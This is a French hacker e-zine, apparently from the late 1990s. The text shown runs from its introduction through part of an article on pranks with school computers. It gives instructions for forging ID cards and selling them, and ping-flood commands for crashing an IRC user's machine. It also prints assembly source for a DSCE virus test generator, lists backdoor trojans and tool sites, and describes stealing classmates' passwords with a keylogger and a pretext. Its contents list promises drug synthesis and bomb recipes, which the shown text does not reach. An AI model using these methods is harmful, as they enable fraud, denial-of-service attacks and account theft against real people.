    _      _         _                                   _      _   
   |H|    |H|       /A\        QQQQQQQ        CCCCCCCC  |H|    |H|  
   |H|    |H|      /AAA\     QQ       QQ     CC         |H|    |H|   
   |H|____|H|     /A/ \A\   QQ         QQ    CC         |H|    |H|   
   |H|HHHH|H|    /A/___\A\  QQ         QQ    CC         |H|HHHH|H|  
   |H|    |H|   /AAAAAAAAA\ QQ         QQ    CC         |H|    |H|     
   |H|    |H|  /A/       \A\ QQ       QQ     CC         |H|    |H| 
   |H|    |H| /A/         \A\  QQQQQQQ  QQ    CCCCCCCC  |H|    |H| 			



Bon ben c parti, ma nouvelle e-zine. J'espere que celle-ci va plaire aux gens qui la lisent. Pour commencer, je vais rpter la mme routine que habituellement une e-zine "illgal"  annonce en dbut d'intro (Que j'Ai copier quelque part). La lecture de cette publication lectronique implique la lecture de ce
cet extrait:.

Ce texte est fourni au lecteur  titre purement ducatif et informatif.En aucun cas les auteurs n'incitent ce dernier au non respect de la loi, sous toute forme qu'il soit.Ce texte est destin uniquement aux personnes auxquelles les auteurs l'ont remis, en consquence il peut tre considre comme une communication prive des auteurs avec ces personnes. Toute organisation reprsentant un ordre quelconque ou toute agence de renseignement est considre comme trangre aux personnes autorises  lire ce texte et en consquence aucune poursuite ne pourratre faite contre les auteurs pour leur publication.


Pour les curieux qui se demande ce que ca veux dire haqch, mais dite vous que j'Ai pris ca au hasard, c'est pourquoi faite aller votre imagination.


Adresse:     http://www.haqch.espace2001.com
email:       bobki@altern.org
Channel irc: #haqch sur Undernet Possibiliter de key: qch (Quelquefois mon bot fuck)

Si vous voulez faire parti de la gang contacter moi!!!!

Vu que c'est la premire, et que j'Ai pas eu grand temps pour la faire, elle ne sera pas bien longue, mais on va se reprendre dans le deuxieme numro, qui lui, va sortir un jour, mais quand??? Quand je vais avoir le temps!!!. Et pour bien dbuter cette e-zine, je vous souhaite bonne lecture!!!!!!!!!! 

Derniere chose, je voudrais dire que je me fou completement des fautes d'orthographes, facque venez pas m'Achaler avec ca.
_____________________________________________________________________________
____________________________________________________________________________
Table des matieres

1- _Franck--->>> Comment se dbuter une compagnie de fausses cartes.
2- _Franck--->>> Qu'est-ce que un Stromgol???
3- _Franck--->>> Dmasquez les chevaux de Troie.
4- endrix---->>> Le ping
5- endrix---->>> Les Virus
6- endrix---->>> La Protection
7- endrix---->>> Fun sur les Ordis De l'Ecole   
8- endrix---->>> Fichiers PWL
9- PiX1------>>> Comment cr...de la mesa sapientum banadine
10-PiX1------>>> Comment cr...(un driv du) LSD-25
11-PiX1------>>> Le saviez-vous?
12-Tod------->>> Le canna punch
13-_Franck--->>> Comment faire du Nitrate de Potassium?
14-_Franck--->>> Comment fabriquer de la poudre noir (Poudre a Canon)?
15-_Franck--->>> Comment fabriquer une bombe de chlore de piscine?
16-_Franck--->>> Dsignations courantes.
17-_Franck--->>> Comment faire des meches qui brulent 2 pouces a la minute?
18-_Franck--->>> Comment faire des meches qui brulent 40 pouces a la minute?
19-_Franck--->>> Comment faire des feux de diffrentes couleurs?(feux de bengales)

___________________________________________________________________________________________________________________________________________________________






_Franck--->>>Comment se dbuter une compagnie de fausses cartes<<<-----------

Dans l'Article qui va suivre, je parle pas de carte d'identit parfaite, comme celle d'assurance maladie, mais bien des cartes comme celle de l'cole, du permis de conduire ou d'autres cartes qui n'ont pas de relief ou d'hologramme dessus.

Pourquoi avoir une fausse carte:

1- Si ta pas 18 ans, et que tu veux rentrer dans les bars ou acheter des 
   armes ou autres.	

2- Si tu veux te faire venir un colis sous un autre nom.

3- Si t'emprunte un objet avec une carte d'identit, et que l'intention de    ne pas le remettre.

4- Ou pour crosser les cochons (polices)


Matriaux ncessaires:

1- Un Scanneur de haute qualit  (prfrence: plus que 600X600 par pouce carr)

2- Une imprimante (laser de prfrence)  (prfrence: plus que 600X600 par                                          pouce carr)
3-Un logiciel pour modifier des images

4-Un plastificateur (entre 3 et 5 mm)

****PLus que votre imprimante et votre scanneur est de qualit (points,pouce), mieux seront les cartes.

Procdure:

Vous prener votre carte, la scanner  la meilleur qualit possible. Ensuite, exemple vous voulez modifiez votre date de naissance pour avoir 18 ans. Exemple que votre date est 82-09-18 et quelle est crit avec une police spcial, tu essais de faire des copies coller. Exemple: tu copie le 0 et tu le place par dessus le 2 de l'Anne de naissance, ce qui donne 80-09-18.Pour autres changements sur la carte c une technique similaire. Ensuite vous imprimez  une qualit la plus lever possible.Par la suite, vous dcouper votre fausse carte, de maniere quel soit la meme grosseur que la vrai, et vous plastifier le tout, avec un plastique la mme paisseur que l'original.


Pour le commerce:

Cela peu tre trs payant si vous vous quipiez d'quipements exllents.PLus les cartes sont exellentes plus les gens sont intresser a payer le prix parce qu'ils ont moins de chance de se faire prendre. C'est pourquoi si vous vous quipier d'un scanner (600X600) avec une imprimante laser similaire et un plastificateur (Cela les 3 ensemble vous coutera entre 900$ et 2500$), vous pouvez faire une bonne qualit de carte d'identit.Si vous vendez les cartes que vous faisez 15$ chaque ou mme 25$, c pas long et votre quipement est payer, et surtout, les profits commence  rentrer.
Un conseil, essayer de vendre vos fausses cartes juste au gens que vous connaissez pour pas vous faire prendre.

Je vous souhaite bonne carriere!!!hh


_Franck

_________________________________________________________________________________________________________________________________________________________
















_Franck ---------->>>>> Qu'est-ce que un Stromgol??? <<<<<--------------

Dans l'Article qui suit, une technique de fumage (weed ou autre) va etre prsent, pour cetain elle est dja connu, pour d'autre vous allez apprendre un nouveau et merveilleux truc pour consummer votre "boucane".

Premierement, le nom Stromgol  t batiser par un de mes chums, mais cette invention peut porter un autre nom dans diffrentes endroits dans le monde. J'explique le principe.

Matriaux

1 bouteille de 2 litres de liqueurs vide (avec bouchon)
1 couteau pour couper du plastique
1 tuyaux de plastique flexible (Environ 2 pieds)
1 ruban adhsif
2 Couteaux pour fumer
1 Torche pour chauffer (propane ou autre) les couteaux  rouge
2 Personnes de prfrences
  Une quantit de stock  fumer 


Explications

-Prener votre bouteille 2 litres et percer un trou de la forme d'un carr sur l'un des cots (3 pouces par 3 pouces).

-Percer un trou dans le bouchon la grosseur du tuyau.

-Placer le tuyau dans le trou du bouchon, en mettant environ 2 pouces de tuyaux dans la parti de la bouteille.

-Prendre le ruban adhsif, et coller le tuyau au bouchon de facon que l'Air ne puisse sortir en dehors du tuyau.

-A cette tape votre Stromgol est pret.

-Voici un dessin que j'Ai fais pour vous montrer de quoi ca l'Air. C'est le fichier stromgol.bmp dans le document .zip dont est compris ce document

-Ensuite vous faite chauffer les couteaux  rouge avec la torche pour fumer vos pofs.

-Vous metter votre bouche sur le tuyaux, votre chum prend la pof avec les couteaux, et met les couteau dans le trou de forme carr pour que la boucane reste dans la bouteille, et vous durant ce temps vous aspirer.

-Vous recommencer les 2 dernires tapes au besoins

-Cela est un rsumer bref de cette technique de fumage, mais elle est assez simple. Avec ce truc vos soirs vont etre encore plus animer et vont vous coter moins cher, parce que vous allez voir que il faut moins de "stock" pour procurer uen excellente effet, hh.....



Articles produite par _Franck 

_________________________________________________________________________________________________________________________________________________________








_Franck------------->>>Dmasquez les chevaux de Troie<<<--------------------


Pour savoir si un cheval de Troie est install sur votre PC et s'il envoie clandestinement des informations par l'internet, servez-vous d'un utilitaire systme de Windows.

Ce programme, Netstat, n'est hlas pas accessible par le menu Dmarrer ni document dans l'aide de Windows. Vous pouvez toutefois le lancer avec la commande netstat dans une invite MS-DOS.

Pour dtecter un cheval de Troie, procdez de la faon suivante.

1-Fermez toutes les applications de transmission par l'internet. Noubliez pas les programmes de courrier lectronique qui vrifient rgulierement l'arrive de nouveau courrier sur le serveur POP ou Personal Web Serveur
Ces programmes pourraient en effet falsifier les valeurs mesures et provoquer une fausse alerte.

2-Connectez-vous sur n'importe quel ftp

3-Sur le ftp tlchanger un fichier d'environ 1 meg pour faire croire  une activit en ligne. Le cheval de Troie est conu pour attendre une connexion Internet active par laquelle il peut transfrer ses donnes. Pour ne pas se faire remarquer, il s'assure que l'utilisateur se sert activement de cette connexion. Ses propres paquets de donnes sont ainsi dissimuls dans la masse.

4-Enregistrer le fichier sur le disque dur.

5-Ouvrez une fentre DOS avec la commande Dmarrer/Programmes/Commandes MS-DOS.

6-Vrifiez avec Netstat quelles connexion TCP/IP sont acuellement actives. Laissez fonctionner Netstat pendant un moment tout en enregistrant les rsultats dans un fichier journal. Pour cela tapez la commande:

netstat -a 1 > netstat.txt

Explication des options de cette ligne:

 -a: oblige Netstat  surveiller toutes les connexions existantes. Par dfaut et pour ne pas submerger l'utilisateur, le programme se contente des informations indispensables. Les informations trahissant une ventuelle transmission clandestine risquent alors d'tre ignores. C'est pourquoi vous devez vous assurer que Netstat enregistre toutes les donnes.

 Le chifre dtermine en secondes le laps de temps que Netstat laisse couler entre les vrifications. Nous avons choisi l'intervalle le plus petit, 1, pour qu'aucune connexion ne nous chappe.

 Par dfaut. Netstat affiche les rsultats  l'cran. Toutefois cet intervalle d'une seconde ne laisse pas le temps de lire. C'est pourquoi nous demandons au programme de sortir les informations dans le fichier Netstat.txt  l'aide de la commande > netstat.txt . Cette commande n'est d'ailleur pas spcifique  Netstat, elle fonctionne dans tous les programmes de l'invite MS-DOS.

7- Au bout d'un moment, quittez Netstat en appuyant sur les touches Ctrl + C

8-Arrter la connexion FTP, mme si le fichier n'est pas entirement tlcharg.

9-Fermez la connexion internet.

10-Dans un diteur de texte quelconque, ouvrez le fichier Netstat.txt, en vrifiez les connexions enregistres.

Si vous voyez des communications avec d'Autres ordinateurs, mfiez-vous. Notamment si vous trouver un numero IP au lieu d'un nom complet. Il s'agit vraisemblablement d'une transmission suspecte.

Ce texte-ci a t prit dans le livre "Scurit et Protection", p 206.


Article produite par _Franck

__________________________________________________________________________________________________________________________________________________________




=============================================================================
=============================================================================
                         _         ____  _
                        | |    ___|  _ \(_)_ __   __ _
                        | |   / _ \ |_) | | '_ \ / _` |
                        | |__|  __/  __/| | | | | (_| |
                        |_____\___|_|   |_|_| |_|\__, |
                                                 |___/
=============================================================================
=================================par endrix==================================

    Bon.... Pourquoi j'ai crit ce texte ??? Ben parce que je suis vraiment
tannez de dire au personnes comment utiliser cette fonction quelque peut
"cacher" de Microsoft qui, part fois, peux etre tres destructive.

Pour me contacter, mon email est  : lordendrix@hotmail.com . 

 Pour commencer, Ping sert a compter, en temps, le lag qu'il y a entre deux
ordinateur. Vous verez les signes suivants : time<10ms ce qui veut dire qu'il
y a 10 millisecondes de lag entre les ordis. Donc, de cette manire, vous
envoyez un signal a l'autre ordinateur et lui vous rponds.

Mais, Comment je peux faire crasher un ordi avec ca ???

 Bon.... pensons un peu... Si tu as une connection rapide, comme un modem
cable, ou une ligne LNPA, ou ISDN.... Tu peux envoyer des pings TRS rapidement on peut appeller ca... un ping flood !! La diffrence entre un ping flood de irc et un ping flood directement sur la connection du gars c'est qui si c'est de irc, la connection va dbranch mais l'ordi plantera pas :))))

 Maintenant, voyon voir de quoi a l'air ping.exe(dans le dir de windows)
Allez Dmarer, Programme et ensuite dans Commande MS-DOS. Apres, vous allez
voir :

Microsoft(R) Windows 98
  (C)Copyright Microsoft Corp 1981-1998

C:\WINDOWS>

tapez :

C:\WINDOWS>ping

vous allez voir :

Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
            [-r count] [-s count] [[-j host-list] | [-k host-list]]
            [-w timeout] destination-list

Options:
    -t             Ping the specifed host until stopped.
                   To see statistics and continue - type Control-Break;
                   To stop - type Control-C.
    -a             Resolve addresses to hostnames.
    -n count       Number of echo requests to send.
    -l size        Send buffer size.
    -f             Set Don't Fragment flag in packet.
    -i TTL         Time To Live.
    -v TOS         Type Of Service.
    -r count       Record route for count hops.
    -s count       Timestamp for count hops.
    -j host-list   Loose source route along host-list.
    -k host-list   Strict source route along host-list.
    -w timeout     Timeout in milliseconds to wait for each reply.



Vous voyez que vous pouvez faire plusieurs combinaisons avec la commande ping.
 cette ligne, faite la commande suivante :

C:\WINDOWS\ping -t -l 10 127.0.0.1
Ca sa va pigner votre ordinateur. C'est suppos donner ca :

Pinging 127.0.0.1 with 10 bytes of data:

Reply from 127.0.0.1: bytes=10 time=1ms TTL=128
Reply from 127.0.0.1: bytes=10 time<10ms TTL=128
Reply from 127.0.0.1: bytes=10 time<10ms TTL=128
Reply from 127.0.0.1: bytes=10 time<10ms TTL=128
Reply from 127.0.0.1: bytes=10 time<10ms TTL=128
Reply from 127.0.0.1: bytes=10 time<10ms TTL=128
Reply from 127.0.0.1: bytes=10 time<10ms TTL=128
Reply from 127.0.0.1: bytes=10 time<10ms TTL=128
Reply from 127.0.0.1: bytes=10 time<10ms TTL=128
Reply from 127.0.0.1: bytes=10 time<10ms TTL=128
Reply from 127.0.0.1: bytes=10 time<10ms TTL=128
Reply from 127.0.0.1: bytes=10 time<10ms TTL=128
Reply from 127.0.0.1: bytes=10 time<10ms TTL=128
Reply from 127.0.0.1: bytes=10 time<10ms TTL=128
Reply from 127.0.0.1: bytes=10 time<10ms TTL=128

jusqu' temps que vous l'arrtiez....... Vous voyez que le temps entre votre
ordinateur et.... votre ordinateur n'est pas trs long !! :-|

Bon.... supposont qu'il y a un con qui vous fait chier.. son nick : con
Allez dans le Status, tappez :
/dns con
cette commande va vous donnez son IP (ex : 207.96.128.233)
Les 3 premiers chiffres sont du serveur et le dernier, c'est le nombre de
connection ulitiler(max 255). Donc, retournez dans votre fentre dos et tappez:

C:\WINDOWS>ping -t -l 256 207.96.128.233

faite cette commande plusieur fois, ouvrez plusieurs fentre dos et il va faire
un ping timeout.

comment faire crasher un system Windows 98 ???? Quand vous allez faire le
/dns con, vous verez quelque chose comme ca :

***Looking up port013.cactuscom.com
***Resolved port013.cactuscom.com to 207.253.190.13
Le IP est 207.253.190.13 et le domaine : port013.cactuscom.com

C:\WINDOWS\ping -l 65510 port013.cactuscom.com

Plusieurs fentres et, bye bye dude !!!

 J'espre que vous ferez pas trop de connerie avec ca la !!!! Adios et a
bientt,
          endrix
          Http://haqch.espace2001.com
          ...oO Pour plus de Zines Oo...
=============================================================================
=============================================================================








=============================================================================
================================= Par endrix=================================
=============================================================================
                             __     ___      _ _
                             \ \   / (_)_ __(_|_)
                              \ \ / /| | '__| | |
                               \ V / | | |  | | |
                                \_/  |_|_|  |_|_|


=============================================================================
=============================================================================
=============================================================================



Introduction : Les virus sont devenus une menace permanente. Une infection est 
               actuellement 20 fois plus probable quil y a 2 ans. On estime 
               quune entreprise infecte a besoin de 5 jours ouvrables pour 
               se dbarrasser totalement de lassaillant. Donc la lutte 
               antivirus revt une importance majeure.
               Mais si vous avez des commentaires, suggestions ou juste me
               e-mailer ben faite le a cette addresse : fbasoft@yahoo.com ou
               sur le chat, je suis sur #outaouais-warrior ou #outaouais ou
               #n0past et #pirate sous le nick de : endrix
               Site web :  http://www.haqch.espace2001.com
                               

1 : Qu'est-ce qu'un virus ?

Un virus est un programme autoreproducteur capable de se propager de 
facon autonome. Il causera des dgats dans le systeme qu'il a infecte. 
Ces degats soit d'ordre logiciel soit meme materiel, certains 
n'hesitent pas a detruire votre BIOS, et vont de l'affichage d'un 
petit message au formatage complet de votre disque dur. Voici les 
sources d'infections : 

Une disquette dont le secteur damorce est infecte. 
Une disquette qui comporte un fichier executable infecte. 
Un LAN (Local Area Network ou reseau local) qui contient un poste 
infecte. Internet, par simple telechargement. 
Le courrier electronique, par un document joint infecte. 
 

2 : Types de virus

On classe les virus de 5 faons : 

 - Virus du secteur damorce ; ils remplacent lamorce dun disque par leur propre 
   code et se chargent ensuite en mmoire centrale. Il rendent inutilisable le 
   disque damorage et/ou se propagent vers dautres disques. 
 - Virus de fichiers ; 
   ils ajoutent leur code aux fichiers excutables (*.exe  *.com *.bat ) et se 
   chargent en mmoire centrale afin de contaminer encore dautre programmes. Il 
   rendent ces programmes inutilisables. 
 - Virus furtifs ; ils chappent  toute dtection en se camouflant. Une des mthodes 
   de dtection consiste  enregistrer la longueur dun programme (si le virus a 
   ajout son code, on peut facilement comparer avec une simple sauvegarde de ce 
   progr. ) 
 - Virus polymorphes ; ils modifient leur aspect  chaque nouvelle infection. 
 - Virus crypts ; ils modifient leur code, ce qui complique leur dtection. 
   On peut ajouter 2 cas, mais souvent moins frquents  cause de leur puissance : 
 - Cheval de Troie ; bombe  retardement implante dans un programme. Il peut se 
   dclencher  tout moment ou attendre un signal externe. Ce nest donc pas un 
   virus puisquil nest pas conu pour se reproduire et se propager. 
 - Bombe logique ; variante du cheval de Troie, elle attend un signal externe pour 
   exploser. Ce signal peut tre une date prcise, un lancement dun certain 
   programme etc.. Les dgts causs par cette bombe peuvent tre dordre matriel 
   des fois, comme une modification du BIOS pour entraner une surcharge lectrique. 
 

3 : Symptomes d'une attaque

Voici les principaux symptomes : 

    - Un chargement dun programme plus long que d'habitude. 
    - Un reseau anormalement charge. 
    - Memoire centrale insuffisante. 
    - Espace disque rduit. 
    - Taille de fichiers qui s'accrot anormalement. 
    - Systome et/ou programmes qui plantent. 
    - Messages d'erreurs ou messages curieux. 
    - Un jeu de ping-pong apparat. 
    - Les caracteres s'ecroulent. 
    - Melodies bizarres au format midi. 
    - Acces disque multiplies. 
    - Perte de fichiers et de donnes. 
    - Programmes refusant de sexcuter ou sexcutent mais de faon anormale. 
    - Autoformatage du disque dur. 
 

4 : Fichiers cibles des virus

Le premier objectif est la contamination de une ou plusieurs cibles qui lui permettront d'etre 
relance le plus souvent possible. Une cible est appelee vecteur de contamination.

En principe, il existe 3 phases d'existence : 

Infection ; le virus infecte le systome cible. 
Contamination ; il se duplique et infecte dautres cibles sans perturber le fonctionnement du 
systome. 
Destruction ; il entre en activite et produit les effets pour lesquels il a ete programme. 
Cibles des virus : 
 - Fichiers executables, surtout les .COM (avec le tres celebre COMMAND.COM qui est lance a 
   chaque dmarrage du systme ). 
 - Fichiers systomes, particulierement les IO.SYS et MSDOS.SYS 
   (qui sont lances au demarrage du systome aussi) . 
 - Les fichiers temporaires de recouvrement .OVL . 
 - Fichiers binaires .BIN. 
 - Fichiers pilotes .DRV. 
 - Le secteur de la table de partition du disque dur (lu par le BIOS  chaque initialisation) 
   ou d'une disquette BOOT. 
 

5 : Programmes antivirus

    - Thunderbyte (http://www.thunderbyte.com)
    - Panda       (http://www.pandasoftware.com)
    - Norton      (http://www.nortonutilities.com)
    - bien d'autre....
 

6 : Voici la source d'un Virus(en asm) :


DSCE_GEN SEGMENT
         ASSUME  CS:DSCE_GEN,DS:DSCE_GEN
         ORG     0100h

MSG_ADDR EQU     OFFSET MSG-OFFSET PROC_START-0007h

         EXTRN   DSCE:NEAR,DSCE_END:NEAR
         EXTRN   RND:NEAR

                      ; HU{AݣFn`Nݦaݪ`ѡA䥦ݡݤvs

START:
         MOV     AH,09h
         MOV     DX,OFFSET DG_MSG
         INT     21h

         MOV     AX,OFFSET DSCE_END+000Fh ; +{ + DSCE+000Fh ݦ}
                                   ; Y 0100h hݥ+{ + DSCE ݪ

         MOV     CL,04h
         SHR     AX,CL
         MOV     BX,CS
         ADD     BX,AX

         MOV     ES,BX                   ; ] ES +өѽX{MQsX
                                                ; ѽX{ݤj 1024 Bytes
                                ; Y+b`n{+Ah`N+tO+jp

         MOV     CX,50
DG_L0:
         PUSH    CX
         MOV     AH,3Ch
         XOR     CX,CX
         MOV     DX,OFFSET FILE_NAME
         INT     21h
         XCHG    BX,AX

         MOV     BP,0100h                                ; ѽX{ݾݾ}
                                       ; ++gr+hPV++פjp]

         MOV     CX,OFFSET PROC_END-OFFSET PROC_START    ; QsX{ݪ

         MOV     DX,OFFSET PROC_START         ; DS:DX -> nQsXݵ{}

         PUSH    BX                                      ; Os File handle

         CALL    RND
         XCHG    BX,AX
         CALL    DSCE

         POP     BX

         MOV     AH,40h        ; ^+ DS:DX = ѽX{ + QsX{ݦ}
         INT     21h     ; CX = ѽX{ + QsX{ݪסA䥦++sݤ+_

         MOV     AH,3Eh
         INT     21h

         PUSH    CS
         POP     DS                                          ; N DS ]^

         MOV     BX,OFFSET FILE_NUM
         INC     BYTE PTR DS:[BX+0001h]
         CMP     BYTE PTR DS:[BX+0001h],'9'
         JBE     DG_L1
         INC     BYTE PTR DS:[BX]
         MOV     BYTE PTR DS:[BX+0001h],'0'
DG_L1:
         POP     CX
         LOOP    DG_L0
         MOV     AH,4Ch
         INT     21h

FILE_NAME DB     '000000'
FILE_NUM DB      '00.COM',00h

DG_MSG   DB      'Generates 50 DSCE encrypted test files.',0Dh,0Ah,'$'

PROC_START:
         PUSH    CS
         POP     DS
         MOV     AH,09h
         CALL    $+0003h
         POP     DX
         ADD     DX,MSG_ADDR
         INT     21h
         INT     20h
MSG      DB      'Dark Slayer !!$'
PROC_END:

DSCE_GEN ENDS
         END     START




7: Conclusion : Ben la j'espre qu'en lisant, vous avez apprit sur les virus 
                et les leurs fonctions. 

==============================================================================
==============================================================================
==============================================================================

 - endrix



==============================================================================
================================= Par endrix =================================
==============================================================================
                ____            _            _   _
               |  _ \ _ __ ___ | |_ ___  ___| |_(_) ___  _ __
               | |_) | '__/ _ \| __/ _ \/ __| __| |/ _ \| '_ \
               |  __/| | | (_) | ||  __/ (__| |_| | (_) | | | |
               |_|   |_|  \___/ \__\___|\___|\__|_|\___/|_| |_|

==============================================================================
==============================================================================
==============================================================================

----VOUS VOULEZ ETRE INVINCIBLE ??? FUCK WINDOWS ET FAITE PLACE A LINUX!!!----

  Introductions : Bienvenue dans le mon du piratage. Ce document va vous
                  dcrire : (1) Qu'est-ce que piratage.
                            (2) Technique employe pour "hacker un micro".
                            (3) Description des techniques.
                            (4) Ou trouver les outils necessaires pour
                                effectuer des petites attaques.
                            (5) Outil pour vous protger
                            (6) Mot de la fin.

                   Eh bien j'espere que ce texte vous aidera a vous protger
                   et je connais quelques personnes qui voudront me tuer
                   aprs avoir ecrit ce texte.... heehe.... Mais si vous avez
                   des commentaires, suggestions ou juste me e-mailer ben
                   faite le  cette addresse : fbasoft@yahoo.com ou sur le
                   chat, je suis sur #outaouais-warrior ou #outaouais ou
                   sur #n0past et #pirate sous le nick de : endrix
                   http://endrix.cjb.net



(1) Qu'est-ce que le piratage ???

    Le piratage, hacking and anglais, est l'art de s'infiltrer dans des
    systeme informatique dont tu n'as pas l'accs et prendre de l'information
    sans rien dtruire. Etre un hacker, c'est etre curieux, dcouvrir de
    nouvelle choses, le dfit de pntrer des systmes super protg comme :
    (FBI, NSA, CIA, Microsoft, IBM......)
    Il y a aussi le "cracking" le cracking a 2 fignification :
    1. "Cracker" un programme c'est editer un .exe et le modifier pour pouvoir
       l'utiliser sans limite. Souvent si vous avez des programmes qui sont d'une
       priode d'utilisation de 30 jours, ben il existe des "cracks" qui vont
       faire que vous pourrez l'utiliser toute votre vie !!! Pour plus d'info :
       http://cracking.home.ml.org 
       http://get-oscar.home.ml.org
       http://www.phrozencrew.org (marche pas tout le temps)
    2. "Cracker" un systme informatique c'est aussi le pirater mais le
       "cracker" ne prend pas seulment les donns, il essait de dtruire le
       systme avec un virus, en supprimant des fichiers..... Pour plus d'info :
       http://www.hackhull.com <--  master of NT destruction


(2) Technique pour hacker un micro

    Pour hacker un micro, il y a plusieur technique et voici quelques une :

    - Les programmes qui ouvre un "backdoor" sur votre ordi :
           - BackOrifice (par http://cultdeadcow.com v1 et v2)
           - Master's paradise
           - Hacker's paradise (dur  trouver)
           - Backdoor2
           - Socket de Troie
           - Absolute Control
           - NetBUS
           - je pense que c'est tout la....

    - Technique de partage de fichier un rseaux
    - Le reniflement (sniffing)
    - L'addresse factice (IP spoofing et pour hacker les gros serveurs)
    - Les vers (plus pour hacker les gros systemes)
    - Les trapes (beaucoup dans Windoz)
    - Force brute (plus pour hacker les gros systemes)



(3) Description des techniques

    - Les programmes qui ouvre un "backdoor" sur votre ordi.
    Tout ces programmes marchent de la meme manire. Ils ont tous desoin d'un
    virus et en passant CE VIRUS NE FORMAT PAS VOTRE ORDI. Je connais quelques
    personnes qui pensent ca mais c pas vrai !! oky ?! La fonction du virus
    d'ouvrir un port sur votre ordi (5000, 31337 et 12345) et le virus agis
    comme serveur et le programme comme client. Donc quand vous tes infects
    par le virus, vous avez juste  entrer le IP de la personne (dans irc, en
    faisant /dns (le nick du gars) et clicker sur connect pi le virus vous
    donne accs  l'ordi du gars !!! Pi aprs tre connect, vous pouvez....
    mmmm... Modifier le reg, accs au HD, ouvrir sont CD-ROM, lui envoyer des
    messages, mettre un mot de passe sur sont ordi(avec netbus mais il y a des
    passwords cracker).... tout faire !!!! Pour plus d'information sur les
    trojans, leurs virus et tous... consult le document "Trojans" (vol 1.4)

    - Technique de partage de fichier
    Cette technique fonctionne seulement si dans votre configuration rseaux
    vous tes en partage de fichier. Ya pas beaucoup de monde qui sont comme
    ca mais il y en a. Cette technique consiste  se connecter sur l'ordi du
    mec avec les commandes de dos suivante : - nbtstat.exe
                                             - nslookup.exe
                                             - net view \\....
    Je ne vais pas montrer comment utiliser cette manire.


    - Reniflement (sniffing)
    Le pirate reprogramme l'ordinateur pour qu'il intercepte chaque message
    qui traverse le rseaux, meme si celui-ci ne lui est pas address.


    - L'addresse factice (IP spoofing)
    L'addresse d'un ordinateur, Internet Provider(IP), qui permet de le
    reconnatre sur le rseaux, est unique. Elle est octroye par des
    services spcialis et certifis. Un pirate peut parfaitement modifier
    celle de sont ordinateur et se faire passer pour quelqu'un de connu du
    serveur victime (aussi utilis pour faire des "takeovers" sur irc.

    - Les vers
    Il s'aggit d'un programme intelligent et autonomes capables de se propager
    et de se dupliquer seuls(un virus). Ce type d'attaque est trs rare parce
    que les serveurs se dodifis beaucoup mais windoz NT fonctionne trs bien
    avec ces choses la......

    - Les trappes
    Ce sont des points d'entre volontairement crs par les concepteurs
    des systmes d'exploitation. Les trappes ignorent toutes les mesures.
    Comment en 1983, Ken Thompson, l'un des concepteurs d'Unix a rvl
    l'existence d'une trappe. Juste en tapant une comande, d'importe qui
    pouvais se connecter sur l'ordinateur d'un autre.

    - Force brute
    Technique qui consiste  trouver le mot de passe d'un serveur pour y
    pntrer. Pour le faire ca prend un "password cracker". Ce programme,
     parir d'un encyclopdie de mot essait tout les mot possible sur le
    mot de passe.




(4) Ou trouver les outils ncessaires pour effectuer des petites attaques.

    CES OUTILS SONT POUR ESSAYER SUR VOUS MEME, PAS SUR LES AUTRES.

    - Des passwords crackers
    - Des Nukers, OOB, ICMP
    - Texts - FAQ
    - Flooders, ICQ, Irc
    - Port Scanners, Listeners
    - Trojans
    - Beaucoup d'autres !!! ...
    -------
    
    - WarForge : http://www.warforge.com
    - Anti-Online : http://www.antionline.com
    - Hackers : http://www.hackers.com
    - Ou juste me le demander


(5) Outil pour vous protger.

    - BouffeTroyen (delete les trogens sur votre ordi)
      http://bouffetroyen.cjb.net
    - Conseal PC Firewall (un bon firewall)
      http://www.signal9.com
    - @Guard (FireWall)
      http://www.???.com
    - PC secure (FireWall)
      http://www.???.com
    - Port Listen (FireWall)
      demandez le moi
    - NukeNabber (FireWall)
      http://www.???.com


(6) Mot de la fin.

    Maintenant que vous savez comment fonctionne le "hacking", vous allez
    vous procurer les outils que j'ai dit et protger votre micro.

==============================================================================
==============================================================================
==============================================================================

 - endrix



===========================================================================
================================= Par endrix =================================
==============================================================================
                           _____ ___   ____   _____
                          |  ___/ _ \ |  _ \ | ____|
                          | |_ | | | || | | ||  _|
                          |  _|| |_| || |_| || |___
                          |_|(_)\___(_)____(_)_____|

                         Fun sur les Ordis De l'Ecole   
==============================================================================
==============================================================================
==============================================================================

 Introduction : Vous trouvez l'ecole plate comme moi ??? Bien, j'ai trouve un
                moyen d'avoir ben du fun avec les ordinateurs de votre cole!
                Moi ca a toujours bien march pi ca a toujours fait capoter le
                prof ou le technicien en informatque. Dans ce texte, je vais
                vous dire quelque moyen de faire chier le prof d'info et le
                technicien en faisant des choses ben facile qui !!!
                Mais si vous avez des commentaires, suggestions ou juste me
                e-mailer ben faite le  cette addresse : fbasoft@yahoo.com ou
                sur le chat, je suis sur #outaouais-warrior ou #outaouais ou
                #pirate ou #n0past sous le nick de : endrix
                Http://www.haqch.espace2001.com


(1er) Moyen(Novell) :
              Si vous allez dans un cegep au il faut entrer sont numero
              etudiant pour logger sur le reseaux(comme moi) lisez ceci!
              Ca c'est pour ceux qui ont Novell :
              1 - Quand vous ouvrez l'ordinateur et que la fenetre de Novell
                  apparait qui dit d'entrer le mot de passe, peser sur
                  Ctrl+ESC, ceci va faire apparatre une autre fentre qui
                  va vous permettre de loader n'importe quel programme sans
                  que le technicien ne s'en appercoive. Vous pouvez aller sur
                  l'internet, gosser avec les .exe dans c:\novell ..... Tout
                  plein de choses  faire.
              2 - Clicker sur l'icone de reseaux dans le bureaux, clicker sur
                  n'importe quel icone(dans la fentre qui va appraitre) avec
                  le boutton de cote et allez dans send message. Ceci va
                  faire apparaitre un autre fentre qui si vous marquer le
                  numero etudiant de votre ami, vous pouvez lui envoyer un
                  message. Maintenant au cegep de Hull il est interdi
                  d'utiliser la messagerie novell.
              3 - Pour voller un mot de passe a quelqu'un. Aller downloader un
                  keystroke recorder. Ce programme enregistre chaque touche
                  qui a ete tappe sur le clavier. Apres avoir installer ce
                  programme, attendez que quelqu'un log avec sont mot de passe
                  et quand qu'elle est logger, allez la voir et dite quelque
                  chose comme : "Scuse, j'ai oublier de copier un fichier
                  texte, tu peux me laisser le faire ??" Naturellement elle va
                  dire oui et allez copier le fichier que le programme a fait
                  (dans le dir du programme). Quand la personne va se delogger
                  aller sur un ordi, entrer le numero etudiant, le mot de
                  passe de la personne(sur le fichier texte) pi la vous etes
                  entrer sur sa connexion. Ne faites pas de connerie avec ca !
                  j'utilise IK comme Keystroke recorder. (http://www.???.com)


(2eme) Moyen (n'importe quel ordi, novell ou pas) :

 1 - Modifier le fichier c:\logo.sys. Ce fichier contient l'image de windows
